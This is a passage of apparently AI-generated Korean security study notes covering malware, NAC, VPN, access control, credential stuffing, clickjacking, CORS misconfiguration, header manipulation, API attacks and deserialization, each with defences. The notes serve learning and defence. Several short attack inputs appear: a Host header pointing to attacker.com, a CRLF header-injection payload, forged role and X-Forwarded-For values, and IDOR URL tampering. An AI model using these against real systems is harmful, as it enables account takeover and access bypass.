3️⃣ USB, 외장 하드 등 이동식 저장매체
4️⃣ 불법 소프트웨어, 불법 다운로드
5️⃣ 취약한 시스템/OS 패치 미적용

4. 악성코드 피해

시스템 성능 저하 / 다운
파일 암호화 및 금전 요구 (랜섬웨어)
개인정보, 금융정보, 인증정보 탈취
내부망 확산 → 기업/기관 보안 사고
봇넷 활용 DDoS 공격

5. 악성코드 방어 방법

1️⃣ 백신/EDR 설치 및 업데이트

실시간 탐지 + 악성코드 차단

2️⃣ OS/응용 프로그램 패치

취약점 악용 감염 예방

3️⃣ 메일·웹 보안

의심 메일 첨부파일 클릭 금지
피싱 URL 차단

4️⃣ 권한 최소화

관리자 권한 최소 사용 → 감염 피해 축소

5️⃣ 정기 백업

랜섬웨어 대응 시 중요

6️⃣ 네트워크 격리 / NAC

감염 장치 격리 → 확산 방지

한 문장 요약

악성코드 = 시스템이나 사용자의 동의 없이 설치되어 정보 탈취, 시스템 손상, 금전 피해 등을 유발하는 악의적 소프트웨어로, 백신, 패치, 보안 정책으로 방어해야 한다.

[보안_GPT] NAC란?

isaacToast — Fri, 14 Nov 2025 14:11:54 +0900

1. NAC란?

정의:
NAC는 네트워크에 접속하는 모든 장치가 보안 정책을 준수하는지 확인하고, 위반 시 접근을 제한하는 보안 기술이야.

즉:

“네트워크에 들어오려는 장치가 안전한지 검사하고, 조건에 맞는 장치만 접근을 허용하는 시스템”

단순 방화벽과 달리 접속 전후 보안 상태를 검사할 수 있음
기업 내부망 보안에서 핵심 역할

2. NAC의 핵심 기능

1️⃣ 접속 전 인증(Authentication)

장치, 사용자, 인증서 기반 로그인 확인
예: 802.1X 인증, RADIUS 서버 연동

2️⃣ 보안 상태 검사(Posture Assessment)

장치 OS, 패치 수준, 백신 상태, 정책 준수 여부 확인
미준수 장치는 격리 또는 제한 네트워크로 이동

3️⃣ 접속 제어(Authorization)

장치/사용자 유형에 따라 접근 권한 부여
예: 직원 PC → 전체망, 외부 장치 → 제한망

4️⃣ 모니터링 및 로깅

접속 시도, 정책 위반 기록
보안관제(SIEM) 연계 가능

5️⃣ 격리 및 대응

위협 감지 시 네트워크 격리 또는 접근 차단
악성 장치 확산 방지

3. NAC 적용 시나리오

1️⃣ 사내 직원 PC 관리

OS 패치, 백신 설치 여부 확인 후 내부망 접근 허용

2️⃣ BYOD(Bring Your Own Device) 관리

개인 스마트폰/노트북이 회사 네트워크 접속 가능하지만, 정책 미준수 시 게스트 VLAN으로 제한

3️⃣ 게스트/외부 장치 접속 관리

방문자 Wi-Fi 접속 시 최소 권한만 허용

4️⃣ 위협 대응

악성코드 감염 장치가 접속 시 자동 격리 → 내부망 확산 방지

4. NAC 종류

구분특징

802.1X 기반 NAC	유선/무선 LAN 접속 전 인증, 스위치/무선 AP 연동
Agent 기반 NAC	장치에 NAC 에이전트 설치 → 보안 상태 검사
Agentless NAC	설치 없이 네트워크 트래픽 분석으로 장치 확인

5. NAC 장점

내부망 보안 강화
정책 위반 장치 자동 격리
BYOD/IoT 환경 안전 관리
보안 관제 연계 가능 (SIEM, 로그)
악성 장치 확산 방지

한 문장 요약

NAC = 네트워크에 접속하는 모든 장치가 보안 정책을 준수하는지 검사하고, 조건을 충족한 장치만 접근을 허용하거나 제한하는 기술

[보안_GPT] VPN이란?

isaacToast — Fri, 14 Nov 2025 14:11:15 +0900

1. VPN이란?

정의:
VPN은 공용 네트워크(인터넷)를 통해 사설망처럼 안전하게 데이터를 주고받도록 연결하는 기술이야.

즉:

“인터넷을 통해 사설망처럼 안전하게 통신할 수 있도록 암호화 터널을 만드는 기술”

2. VPN의 핵심 기능

1️⃣ 데이터 암호화

인터넷에서 전송되는 데이터가 외부에서 보거나 수정되지 않도록 암호화
예: HTTPS보다 더 강력하게 전체 트래픽 암호화 가능

2️⃣ IP 주소 숨김 / 익명화

외부에서 실제 IP를 알 수 없음
위치 추적 방지, 사내망 접근 시 보안 강화

3️⃣ 원격지 사설망 접근

재택근무, 출장 등 외부에서 회사 내부망 접속 가능

3. VPN 종류

1️⃣ 원격 접속 VPN(Remote Access VPN)

개인 사용자 → 회사/사설망 접속
예: 직원이 집에서 회사 내부 서버 접속

2️⃣ 사이트 간 VPN(Site-to-Site VPN)

지사 ↔ 본사 네트워크 연결
예: A 지사와 B 지사가 공용 인터넷 통해 안전하게 내부망 연결

3️⃣ SSL VPN

브라우저 기반, HTTPS를 통해 VPN 연결
설치 없이 웹 접속 가능

4️⃣ IPsec VPN

네트워크 계층(L3)에서 암호화 터널 생성
장비 간 연결 시 사용

4. VPN 활용 사례

원격근무 보안: 회사 내부망 접속
공용 Wi-Fi 보호: 카페, 공항에서 개인정보 보호
지역 제한 우회: 해외 콘텐츠 접근
네트워크 분리: 내부망과 외부망 구분

5. VPN과 보안 고려사항

1️⃣ 암호화 강도

AES-256 등 강력한 암호화 사용 권장

2️⃣ 인증

사용자 인증(MFA), 장치 인증

3️⃣ 로그 관리

VPN 접속 기록 모니터링

4️⃣ 안티 멀웨어

VPN만으로 안전하지 않음, 장치 자체 보안 필요

5️⃣ 속도

암호화 때문에 속도 저하 가능 → QoS 고려

한 문장 요약

VPN = 공용 인터넷을 통해 안전하게 데이터를 전송하고, 사설망처럼 원격 접속을 가능하게 하는 기술로, 암호화와 인증을 통해 보안을 강화한다.

[보안_GPT] 트래픽 통제란?

isaacToast — Fri, 14 Nov 2025 14:10:08 +0900

1. 트래픽 통제란?

정의:
트래픽 통제는 네트워크에서 흐르는 데이터(트래픽)를 관리하고 제어하는 기술을 의미해.

즉, 누가, 어디서, 어떤 데이터를 얼마나 보낼 수 있는지 제한/관리하는 것
주로 보안, 성능, 서비스 안정성 목적으로 사용됨

2. 트래픽 통제 목적

1️⃣ 보안

악성 트래픽(DoS/DDoS, 스팸, 악성 패킷) 차단
내부망 침입 시도 제한

2️⃣ 서비스 안정성

네트워크 과부하 방지
특정 사용자/서비스 과도한 사용 제한

3️⃣ 품질(QoS) 보장

중요한 서비스(VoIP, 영상 회의 등)에 대역폭 우선 할당
덜 중요한 트래픽은 제한

3. 트래픽 통제 방법

1️⃣ IP/Port 기반 필터링

특정 IP나 포트 접근 차단
방화벽(Firewall)에서 주로 사용

허용: 192.168.0.0/24 차단: 외부 203.0.113.0

2️⃣ 프로토콜/서비스 기반 제한

HTTP, HTTPS, FTP 등 특정 프로토콜만 허용
예: 외부 FTP 접속 차단

3️⃣ 대역폭/속도 제한(Rate Limiting)

사용자 또는 서비스별 트래픽 양 제한
예: 로그인 시도 초당 5회 제한

4️⃣ 트래픽 우선순위(QoS, Traffic Shaping)

중요한 트래픽 우선 처리
VoIP > 일반 웹 트래픽

5️⃣ 세션/연결 수 제한

동시에 열 수 있는 연결 수 제한 → 서버 과부하 방지

6️⃣ IDS/IPS 기반 차단

비정상 패킷, 공격 패턴 탐지 시 자동 차단

4. 트래픽 통제와 보안

트래픽 통제는 단순히 속도 조절만 하는 게 아니라, 보안관제와 연결됨

DoS/DDoS 공격 방어
- 대량 패킷 유입 시 트래픽 제한
WAF(Web Application Firewall)
- 비정상 요청 패턴 차단
네트워크 접근 제어
- 허용되지 않은 외부 연결 차단

5. 트래픽 통제 장점

서버·네트워크 안정성 향상
악성 공격(DoS, Credential Stuffing 등) 피해 최소화
서비스 품질 보장(QoS)
로그 기반 보안 모니터링 가능

한 문장 요약

트래픽 통제 = 네트워크를 통해 흐르는 데이터를 관리·제어하여 보안, 안정성, 서비스 품질을 보장하는 기술로, IP 필터링, 속도 제한, QoS, IDS/IPS 등으로 구현할 수 있다.

[보안_GPT] 접근제어란?

isaacToast — Fri, 14 Nov 2025 14:09:28 +0900

1. 접근제어란?

정의:
접근제어는 누가, 언제, 어디서, 어떤 자원에 접근할 수 있는지를 제어하는 보안 기능이야.

즉:

“사용자 또는 시스템이 특정 데이터·기능·서비스에 접근할 수 있는 권한을 관리하는 것”

정보보안의 핵심 원칙 중 하나: 권한 없는 접근 차단(Least Privilege Principle)
인증(Authentication)과 함께 사용됨
- 인증: “누구냐?” 확인
- 접근제어: “무엇을 할 수 있냐?” 결정

2. 접근제어의 기본 원칙

1️⃣ 최소 권한 원칙 (Least Privilege)

사용자에게 필요한 최소 권한만 부여
예: 일반 사용자는 읽기만, 관리자만 쓰기 가능

2️⃣ 역할 기반(RBAC) / 속성 기반(ABAC) 제어

사용자 역할(Role) 또는 속성(Attribute)에 따라 접근 결정

3️⃣ 승인(Authorization) 필요

인증 후에도, 자원 접근 여부는 항상 서버/시스템에서 확인

3. 접근제어 유형

1️⃣ 수평적 접근 제어(Horizontal Access Control)

동일 권한 사용자 간 제한
예: A 사용자가 B 사용자의 데이터 조회 불가

/user/profile?userId=101

userId=102로 바꾸면 다른 사용자의 정보 접근 가능 → 수평적 제어 실패

2️⃣ 수직적 접근 제어(Vertical Access Control)

권한 수준에 따른 제한
예: 일반 사용자가 관리자 페이지 접근 불가

/admin/dashboard → 일반 사용자 접근 차단

3️⃣ Mandatory Access Control(MAC, 강제적 접근 제어)

시스템 정책에 의해 강제로 접근 통제
보안 등급 기반, 사용자가 권한 변경 불가

4️⃣ Discretionary Access Control(DAC, 재량적 접근 제어)

자원 소유자가 접근 권한 부여
예: 파일 소유자가 읽기/쓰기 권한 설정

5️⃣ Role-Based Access Control(RBAC, 역할 기반)

역할(Role)별 권한 설정
예: 관리자(Admin) → 모든 기능, 일반 사용자(User) → 제한 기능

6️⃣ Attribute-Based Access Control(ABAC, 속성 기반)

사용자, 리소스, 환경 속성 기반 접근 결정
예: 특정 IP, 시간대, 위치에서만 접근 허용

4. 접근제어 공격 유형

Broken Access Control: 권한 검증 미흡 → 다른 사용자/관리자 권한 탈취
IDOR(Insecure Direct Object Reference): URL/파라미터 조작 → 다른 사용자 데이터 접근
권한 상승(Privilege Escalation): 일반 → 관리자 권한 상승

5. 접근제어 방어 방법

1️⃣ 서버 측 권한 검증

클라이언트 검증만 믿지 말기
모든 요청마다 Role/Attribute 검증

2️⃣ 최소 권한 정책

기본 권한을 최소로 설정, 필요 시 권한 상승

3️⃣ 로그 및 모니터링

비정상적인 접근 시도 기록
보안관제 알람 설정

4️⃣ RBAC/ABAC 정책 명확화

역할별, 속성별 접근 범위 문서화
정책 변경 기록 유지

5️⃣ 보안 테스트

수평/수직적 접근 제어 취약점 점검
OWASP Top 10 Broken Access Control 체크

한 문장 요약

접근제어 = 사용자가 어떤 자원에 접근할 수 있는지 권한을 관리하고 통제하는 보안 기능으로, 최소 권한 원칙과 역할/속성 기반 정책을 적용해 보호해야 한다.

[보안_GPT] 크리덴셜 스터핑(Credential Stuffing)이란?

isaacToast — Fri, 14 Nov 2025 11:27:55 +0900

**Credential Stuffing(크리덴셜 스터핑)**은
유출된 계정 정보를 자동화 도구로 여러 서비스에 반복적으로 로그인 시도하는 공격이야.

즉:

다른 사이트에서 털린 ID/비밀번호를 가져다가 자동으로 대입하며 계정을 탈취하는 공격

Brute Force와 비슷해 보이지만, 근본적으로 완전 다른 공격이야.

1. Credential Stuffing이란?

공격자는 먼저 다른 웹사이트에서 유출된 이메일/비밀번호 목록을 확보함
(다크웹, 데이터 침해 사고, 유출 DB 등)
그걸 자동화 스크립트/봇으로 여러 서비스(구글, 네이버, 쇼핑몰, 은행 등)에 넣어봄
사용자가 같은 비밀번호를 여러 사이트에서 재사용할 경우, 쉽게 계정이 털림

예:

공격자가 확보한 유출 정보: email1@gmail.com : qwer1234! email2@naver.com : 123456 → 같은 정보로 다른 사이트에 로그인 시도

2. Brute Force vs Credential Stuffing 차이

구분Brute ForceCredential Stuffing

시도 방식	가능한 모든 비번을 시도	이미 유출된 실제 비번을 사용
성공 확률	낮음	매우 높음
자동화	가능	매우 활발
공격 속도	느릴 수 있음	매우 빠름 (봇/프록시 사용)
방어 난이도	쉬운 편	어려움

3. 공격 시나리오

1️⃣ 다크웹에서 1억 개 유출된 이메일/비밀번호 목록 구매
2️⃣ 자동화 툴 사용 (ex. Sentry MBA, OpenBullet 등)
3️⃣ 여러 웹사이트에 대량 로그인 요청
4️⃣ 일치하는 계정을 찾아내기
5️⃣ 정보 탈취, 결제 악용, 계정 도용

4. Credential Stuffing 발생 시 피해

쇼핑몰 → 포인트·적립금 탈취
이메일 → 개인 정보, 연락처 등 유출
금융 계정 → 결제/송금 악용
회사 계정 → 내부 시스템 침입(보안 관제에서도 격상 사건)
MFA 미사용 기업은 큰 타격

5. 방어 방법

✔ (1) MFA 필수 적용

비밀번호가 노출돼도 계정 보호 가능

✔ (2) 로그인 시도 패턴 분석

같은 IP에서 수백 개 계정 로그인 시도
여러 국가에서 동시에 같은 계정 접속
속도가 비정상적 (봇 패턴)

✔ (3) CAPTCHA 적용

봇 자동화를 큰 폭으로 차단

✔ (4) 비밀번호 재사용 방지 정책

이미 유출된 비밀번호를 사용하지 못하게 막기
(HIBP API 검사 등)

✔ (5) Rate-Limiting (속도 제한)

계정별, IP별 제한
비정상 폭주 트래픽 차단

✔ (6) WAF/보안관제에서 탐지

User-Agent 변조
여러 IP에서 반복 요청
로그인 실패 폭증 알람

한 문장 요약

Credential Stuffing = 다른 사이트에서 유출된 실제 비밀번호를 이용해 자동으로 로그인 시도하는 공격. 비밀번호 재사용이 핵심 원인. MFA와 속도 제한이 가장 효과적인 방어.

[보안_GPT] Brute Force란?

isaacToast — Fri, 14 Nov 2025 11:26:59 +0900

**Brute Force(무차별 대입 공격)**를 정리해줄게.

1. Brute Force란?

정의:
Brute Force 공격은 가능한 모든 조합을 하나씩 시도하여 비밀번호, 암호화 키, 인증 토큰 등을 알아내는 공격이야.

쉽게 말하면:

“모든 경우의 수를 다 시도해서 결국 맞는 값을 찾아내는 힘으로 하는 공격”

2. 공격 대상

로그인 시스템
- 웹/앱 로그인 페이지
- SSH, FTP, RDP 등 원격 접속
암호화된 데이터
- ZIP, PDF, 문서 암호
- 해시된 비밀번호
인증 토큰 / API 키
- 짧거나 예측 가능한 키일 경우

3. 공격 방식

1️⃣ 단순 무차별 대입

가능한 모든 문자열 조합을 순차적으로 시도

password1 → password2 → password3 → ...

2️⃣ 사전 기반 공격(Dictionary Attack)

실제 사용자가 쓰는 비밀번호 목록을 이용
예: "123456", "qwerty", "password"

3️⃣ Hybrid Attack

사전 공격 + 숫자/특수문자 조합 변형
예: "password" → "password1", "Password123!"

4. 공격자가 얻을 수 있는 것

계정 탈취
관리자 권한 획득
개인 정보 접근
금융/결제 정보 탈취
서비스 DoS 유발 (로그인 시도 폭주)

5. Brute Force 방어 방법

✔ 1) 비밀번호 정책 강화

최소 길이 8~12자
대문자 + 소문자 + 숫자 + 특수문자
비밀번호 재사용 금지

✔ 2) 로그인 시도 제한

실패 시 계정 잠금 또는 일정 시간 로그인 차단
예: 5회 실패 → 15분 차단

✔ 3) CAPTCHA 적용

사람만 로그인 가능하도록 봇 차단

✔ 4) MFA(2단계 인증) 적용

비밀번호가 노출돼도 추가 인증 필요

✔ 5) 비밀번호 해시 저장

해시 알고리즘 + salt 사용 (bcrypt, Argon2)

✔ 6) IP/지역 기반 차단

특정 IP에서 반복 실패 시 접근 제한
이상 로그인 감지

✔ 7) WAF 대응

반복 로그인 시도 패턴 차단
Credential Stuffing 탐지

한 문장 요약

Brute Force = 가능한 모든 비밀번호/토큰 조합을 시도해 인증을 뚫는 공격으로, 비밀번호 강화, 로그인 제한, MFA, WAF 탐지로 방어해야 한다.

[보안_GPT] Clickjacking이란?

isaacToast — Fri, 14 Nov 2025 11:26:24 +0900

웹 보안에서 유명한 Clickjacking을 정리해줄게.

1. Clickjacking이란?

정의:
Clickjacking은 공격자가 사용자가 클릭하는 UI를 속여서, 원래 의도와 다르게 행동하게 만드는 공격이야.
즉:

“보이는 화면과 실제 클릭되는 버튼이 다르게 만들어, 사용자를 속여 악성 행동을 하게 하는 기법”

별명: UI redressing, UI 가짜 조작

2. 공격 원리

공격자가 투명 또는 가짜 버튼을 만들고, 정상 버튼 위에 덮어 놓음
사용자가 클릭하면 공격자가 원하는 동작 수행
사용자는 자신이 뭘 클릭했는지 모름

[사용자가 보는 화면] "무료 쿠폰 받기 버튼" [실제로 클릭되는 화면] "계정 설정 삭제" / "관리자 권한 실행"

공격 대상: 버튼, 링크, 체크박스 등 모든 클릭 가능한 요소
주로 iframe, CSS, 투명 레이어 사용

3. 대표적인 공격 예시

1️⃣ 관리자 권한 탈취

공격자가 iframe으로 관리 페이지를 숨김
일반 사용자가 클릭 → 관리자 기능 실행

2️⃣ ‘좋아요’/‘팔로우’ 조작

Facebook/Instagram 페이지에서 사용자 모르게 ‘좋아요’/‘팔로우’ 클릭

3️⃣ 금융/결제 클릭 유도

은행 이체/결제 버튼 위에 공격자 UI 덮음
사용자가 클릭 → 돈이 공격자 계좌로 이체

4. 공격 구현 방법

투명 iframe을 공격자가 만든 버튼 위에 겹쳐놓음

5. 방어 방법

✔ 서버 측

X-Frame-Options 헤더 설정
- DENY → iframe 완전 차단
- SAMEORIGIN → 같은 도메인만 허용
- 예:
- X-Frame-Options: DENY
Content-Security-Policy(CSP) frame-ancestors 설정
- iframe 허용 출처 제한
- 예:
- Content-Security-Policy: frame-ancestors 'self';

✔ 클라이언트 측

중요 버튼 클릭 전 추가 확인 (2단계 확인)
민감 기능은 iframe에서 실행하지 않음

✔ WAF / 보안관제

iframe embedding 관련 응답 헤더 미설정 탐지
외부에서 민감 URL iframe 호출 패턴 모니터링

한 문장 요약

Clickjacking = 사용자가 클릭하는 UI를 속여, 자신이 의도하지 않은 동작을 수행하게 만드는 공격으로, X-Frame-Options와 CSP로 방어할 수 있다.

[보안_GPT] CORS(Cross-Origin Resource Sharing)란?

isaacToast — Fri, 14 Nov 2025 11:25:53 +0900

**CORS Misconfiguration(CORS 설정 오류)**를 정리해줄게.

1. CORS(Cross-Origin Resource Sharing)란?

정의:
CORS는 웹 브라우저가 다른 도메인의 리소스에 접근할 수 있게 허용할지 결정하는 정책이야.
브라우저에서만 강제되고, 서버에서 설정함.

출처(origin) = 프로토콜 + 도메인 + 포트
같은 출처 정책(Same-Origin Policy) 때문에, 기본적으로 다른 도메인 요청은 차단됨
서버가 명시적으로 허용해야 접근 가능

예시:

Access-Control-Allow-Origin: https://example.com

2. CORS Misconfiguration이란?

CORS Misconfiguration은 서버가 CORS 정책을 잘못 설정해서 공격자가 다른 출처에서 민감 데이터에 접근할 수 있는 상황을 말해.

즉:

“서버가 너무 느슨하게 허용하거나, 악성 출처도 허용하는 상태”

3. 대표적인 잘못된 설정

1️⃣ 모든 출처 허용

Access-Control-Allow-Origin: *

인증 쿠키/토큰이 필요한 API는 위험
외부 사이트에서 사용자 데이터 탈취 가능

2️⃣ 동적 허용 잘못 구현

origin = request.headers['Origin'] Access-Control-Allow-Origin = origin

검증 없이 모든 Origin 반영 → 공격자 사이트도 허용

3️⃣ 자격 증명(Credentials)과 * 같이 허용

Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: *

브라우저가 인증 쿠키/세션까지 공격자 사이트에 전송 → 계정 탈취 가능

4️⃣ 잘못된 허용 도메인

*.example.com을 허용하면서 evil.example.com도 포함되는 경우

4. 공격 시나리오

1️⃣ 사용자 세션 탈취

공격자가 악성 사이트에서 JS를 실행
느슨한 CORS 허용 → victim 사이트 API 호출
쿠키/세션이 공격자에게 노출

2️⃣ 민감 정보 노출

API가 JSON으로 반환하는 사용자 정보 접근 가능

3️⃣ 권한 우회

공격자가 자신의 Origin에서 관리자 전용 API 호출 가능

5. 방어 방법

✔ 1) Origin 화이트리스트만 허용

반드시 신뢰할 수 있는 도메인만 허용

✔ 2) Credentials + Origin * 조합 금지

Access-Control-Allow-Origin과 Allow-Credentials: true를 함께 쓰지 않음

✔ 3) 서버에서 인증/권한 확인

CORS는 브라우저 정책일 뿐, 서버 측 권한 검증은 필수

✔ 4) 프리플라이트(OPTIONS) 요청 검증

허용되지 않은 메소드/헤더는 차단

✔ 5) 개발 단계 점검

OWASP CORS Security Cheat Sheet 참고

한 문장 요약

CORS Misconfiguration = 서버가 잘못된 출처 허용으로 공격자가 브라우저를 통해 다른 도메인에서 민감 데이터에 접근할 수 있게 되는 취약점

[보안_GPT] TTP 헤더 조작(HTTP Header Manipulation)이란?

isaacToast — Fri, 14 Nov 2025 11:24:27 +0900

**HTTP 헤더 조작(HTTP Header Manipulation)**이란
공격자가 요청(Request) 또는 응답(Response)의 HTTP 헤더 값을 변조하거나 악의적으로 주입하여
원래 의도와 다르게 동작하도록 만드는 공격이야.

즉:

헤더에 악성값을 넣어 서버/클라이언트의 동작을 꼬이게 하는 공격

웹 보안에서 매우 흔하게 발생하며, 다양한 공격으로 이어질 수 있어.

1. 어떤 헤더가 조작 대상일까?

요청(Request) 헤더

User-Agent
Referer
Host
Cookie
X-Forwarded-For
Content-Type
인증 토큰(JWT, Bearer Token)

응답(Response) 헤더

Location
Set-Cookie
Content-Security-Policy
Access-Control-Allow-Origin 등

2. 대표적인 헤더 조작 공격 유형

1️⃣ Host Header Injection

공격자가 Host 헤더를 변조해서 다음을 유발:

비밀번호 재설정 링크 탈취
내부 호스트로 요청 우회
SSRF 유발

GET / HTTP/1.1 Host: attacker.com

2️⃣ HTTP Response Splitting

헤더에 개행문자(\r\n)를 삽입해 서버 응답을 둘로 쪼개는 공격
→ XSS, 캐시 오염(Cache Poisoning) 발생

예:

GET /?name=abc%0d%0aSet-Cookie:session=hack

3️⃣ Cookie Manipulation

클라이언트가 쿠키 값을 변조해서 인증/세션 우회

Cookie: role=admin

4️⃣ X-Forwarded-For 헤더 변조

IP 우회, Rate Limit 우회
WAF / API Gateway가 클라이언트 IP를 이 헤더로 판단할 때 위험

예:

X-Forwarded-For: 127.0.0.1

5️⃣ CORS 헤더 조작 (특히 Access-Control-Allow-Origin)

서버 오리진을 우회하도록 만들어 민감 데이터 탈취

3. 공격으로 이어지는 실제 사례

✔ 1) 비밀번호 재설정 링크 탈취

Host 변조 → Reset URL이 공격자 도메인으로 생성됨
→ 이메일 받은 피해자가 클릭
→ 공격자에게 토큰 전달 → 계정 탈취

✔ 2) 캐시 오염(Cache Poisoning)

Response Splitting으로 Content-Type 또는 Location 헤더를 주입
→ 여러 사용자가 악성 페이지로 리다이렉트

✔ 3) 인증 우회

쿠키/Authorization 헤더 값 변조
→ 권한 상승, 세션 탈취

✔ 4) WAF·로그 우회

User-Agent / XFF 조작으로 탐지 회피

4. 방어 방법

✔ (1) 입력값 검증 강화

\r, \n 문자 필터링
Host 등 민감 헤더는 화이트리스트 사용

✔ (2) 중요한 헤더는 서버에서 강제 설정

Host, Origin 등을 클라이언트 입력에 의존하지 않기

✔ (3) 인증/권한 검증 강화

모든 요청에서 세션/토큰 검사가 필수

✔ (4) WAF 규칙 적용

HTTP Response Splitting 패턴 필터링
비정상 헤더 길이/문자 규칙 적용

✔ (5) 안전한 쿠키 설정

HttpOnly, Secure, SameSite 적용

한 문장 요약

HTTP 헤더 조작 = 공격자가 요청/응답 헤더를 변조해 인증 우회, 리다이렉트 조작, 캐시오염, XSS 등 다양한 보안 문제를 일으키는 공격

[보안_GPT] API 취약점 공격이란?

isaacToast — Fri, 14 Nov 2025 11:23:29 +0900

**API 취약점 공격(API Vulnerability Attack)**을 실무 관점에서 정리해줄게.
최근 클라우드·모바일·웹 서비스에서 API를 통한 공격이 많아서 꼭 이해해야 해.

1. API 취약점 공격이란?

정의:
API 취약점 공격은 애플리케이션이 제공하는 API 엔드포인트의 설계/구현상의 문제를 공격자가 이용해 불법적으로 데이터에 접근하거나 기능을 오용하는 공격을 의미해.

쉽게 말하면:

“앱이나 웹에서 제공하는 API를 이용해서, 공격자가 권한 없이 정보를 훔치거나 서버를 조작하는 공격”

2. 공격 대상

API 취약점 공격은 주로 다음 부분에서 발생함:

인증(Authentication) 취약점
- API 토큰 탈취, 인증 우회
권한(Authorization) 취약점
- Broken Access Control과 유사, 다른 사용자의 데이터 접근 가능
입력값 검증 미흡
- SQL Injection, Command Injection, XSS, SSRF
Rate Limiting 부재
- Brute-force 공격, DoS 공격 가능
데이터 노출
- 과도한 정보 반환(Overexposure)

3. 대표적인 공격 유형

1️⃣ Broken Object Level Authorization (BOLA)

GET /api/orders/123 → 내 주문 GET /api/orders/124 → 남의 주문 접근 가능 ❌

사용자 권한 검증 미흡으로 다른 사용자 데이터 탈취

2️⃣ Excessive Data Exposure

POST /api/user/profile 응답에 민감 데이터(비밀번호 해시, SSN, 토큰) 포함

3️⃣ Lack of Rate Limiting

로그인, 결제, SMS 인증 API에 요청 제한 없음
Brute-force, Credential Stuffing 가능

4️⃣ Mass Assignment

JSON 요청에서 허용되지 않은 필드 조작 가능

{ "role": "admin" }

→ 권한 상승

5️⃣ Injection 공격

SQL, NoSQL, Command Injection, XXE 등 API 요청으로 실행 가능

6️⃣ API Endpoint Enumeration

공개되지 않은 엔드포인트 탐지 → 내부 정보 유출

4. 공격자가 할 수 있는 일

사용자 개인정보 탈취
관리자 권한 획득
내부 시스템 데이터 조회/변조
계정 탈취 및 세션 하이재킹
DoS 공격
내부망 접근 (SSRF 등 연계 가능)

5. WAF / 보안관제 대응

인증/권한 검증

JWT, OAuth 토큰 검증
사용자 권한 검증 체크

Rate Limiting

IP별 요청 제한
반복 요청 패턴 탐지

민감 데이터 탐지

JSON 응답 내 민감 정보 포함 여부 모니터링

비정상 요청 탐지

API 요청 구조 이상, 의심 파라미터 차단

로깅 및 알림

관리자 권한 요청, 비정상 응답 시 알람

6. 개발 단계 방어

✔ 1) 인증/권한 철저히 검증

모든 엔드포인트에서 서버 측 권한 확인

✔ 2) 입력값 검증

타입, 길이, 형식 검사
SQL/Command/XXE 필터링

✔ 3) 출력값 최소화

필요한 데이터만 반환
민감정보 제거

✔ 4) Rate Limit & Throttling 적용

✔ 5) API 보안 가이드 준수

OWASP API Security Top 10 기반 설계

한 문장 요약

API 취약점 공격 = 공격자가 인증·권한·입력값·출력 검증의 허점을 이용해 서버나 데이터를 불법적으로 접근·조작하는 공격으로, 철저한 인증·권한 검증, 입력/출력 검증, Rate Limiting으로 방어해야 한다.

[보안_GPT] 직렬화 / 역직렬화란?

isaacToast — Fri, 14 Nov 2025 11:22:59 +0900

**Insecure Deserialization(취약한 역직렬화)**란
애플리케이션이 **신뢰할 수 없는 데이터(입력값)**를 그대로 역직렬화(deserialize)할 때 발생하는 취약점이야.
즉, 공격자가 조작한 직렬화 데이터를 서버가 풀어 읽으면서 임의 코드 실행, 권한 상승, 데이터 변조 등이 일어날 수 있어.

직렬화 / 역직렬화란?

✔ 직렬화(Serialization)

데이터(객체)를 파일·네트워크 전송용으로 문자열/바이트 형태로 변환하는 과정

✔ 역직렬화(Deserialization)

직렬화된 데이터를 다시 객체로 복원하는 과정

문제는…
역직렬화 시 데이터가 신뢰할 수 없는 출처라면, 공격자가 악의적인 객체를 넣을 수 있다는 것!

⚠ Insecure Deserialization은 왜 위험해?

서버는 역직렬화를 할 때 객체 내부의 함수나 생성자, 메소드 호출을 자동으로 실행할 때가 많아.
이 틈을 이용해 공격자는 다음을 할 수 있어:

가능한 공격

RCE(Remote Code Execution)
→ 서버에서 명령어 실행
권한 상승
데이터 변조/삭제
세션 탈취
Dos 공격 (무거운 객체를 통해 서버 자원 고갈)

공격 예시 (개념)

서버가 쿠키를 직렬화된 객체로 저장한다고 가정하자:

eyJ1c2VyTmFtZSI6ICJpc2FrIn0= # 정상 base64 데이터

공격자는 객체 구조를 알고 있다면 이렇게 바꿀 수 있음:

악성 payload 를 담은 직렬화 데이터(base64)

서버가 이것을 그대로 역직렬화하면
→ 공격자의 악성 객체 안 메소드가 자동 실행될 수 있음
→ 결과적으로 서버에서 명령이 실행되기도 함.

특히 Java의 Serializable,
PHP의 unserialize(),
Python pickle,
Ruby Marshal.load,
.NET BinaryFormatter 등이 취약한 대표적 사례.

방어 방법

✔ 1) 역직렬화 대상은 반드시 신뢰된 데이터만

사용자 입력값을 절대 역직렬화하지 않기

✔ 2) 직렬화를 JSON, JWT 등 안전한 포맷으로 변경

객체 기반 직렬화 사용하지 않기

✔ 3) 허용된 클래스만 역직렬화

“화이트리스트” 기반

✔ 4) 역직렬화 전에 입력값 검증

크기 제한
비정상 패턴 필터링

✔ 5) 라이브러리 취약점 패치

Java Commons Collections, Jackson 등의 취약점 패치 중요

✔ 6) WAF 정책 적용

직렬화 Payload(예: Java gadget chain signatures) 차단

[보안_GPT] Broken Access Control이란?

isaacToast — Fri, 14 Nov 2025 11:21:52 +0900

**Broken Access Control(취약한 접근 제어)**란
사용자가 원래 접근하면 안 되는 리소스나 기능에 접근할 수 있게 되는 보안 취약점을 말해.
OWASP Top 10에서도 가장 위험한 취약점 1위로 다룰 정도로 매우 중요해.

Broken Access Control이란?

애플리케이션이 사용자의 **권한(Role)**을 제대로 검증하지 않아서
사용자가 다른 사람 데이터에 접근하거나,
관리자 기능을 실행하거나,
자신의 권한을 초과한 행동을 수행할 수 있는 상황을 의미해.

대표적인 공격 시나리오

1️⃣ IDOR (Insecure Direct Object Reference, 직접 객체 참조 취약점)

URL만 바꿔도 남의 정보가 보이는 경우

/user/profile?userId=100 → 내 정보 /user/profile?userId=101 → 다른 사람 정보가 보임 ❌

2️⃣ 권한 상승(Privilege Escalation)

원래 일반 사용자 → 관리자로 권한 상승
예:
요청 수정을 통해 admin용 기능을 실행

role=user → role=admin 로 변조

3️⃣ 수평적 접근 통제 우회

사용자 A가 사용자 B의 데이터를 읽거나 삭제
예:
/order/1234/delete 를 호출해 남의 주문 삭제

4️⃣ 수직적 접근 통제 우회

관리자 페이지 접속

/admin/users

보안 검증 없이 URL만 들어가도 접근되는 경우

5️⃣ 클라이언트 측 검사만 할 때

자바스크립트로만 권한을 검사하는 경우
유저가 JS 수정해서 우회 가능

Broken Access Control을 방지하려면

